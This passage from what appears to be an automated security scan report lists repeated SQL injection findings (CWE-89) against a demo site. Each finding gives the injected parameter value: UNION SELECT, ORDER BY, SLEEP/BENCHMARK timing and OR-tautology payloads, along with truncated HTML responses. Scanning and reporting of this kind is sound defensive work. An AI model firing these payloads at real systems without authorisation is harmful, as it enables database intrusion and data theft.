from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1646\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1647Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1648\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1649\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1650\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1651\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1652\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 29#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1653\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1654\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' OR '1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1655\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" OR 1 = 1 -- -\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1656\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1657\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT USER()\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1658\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1659\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1660\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName 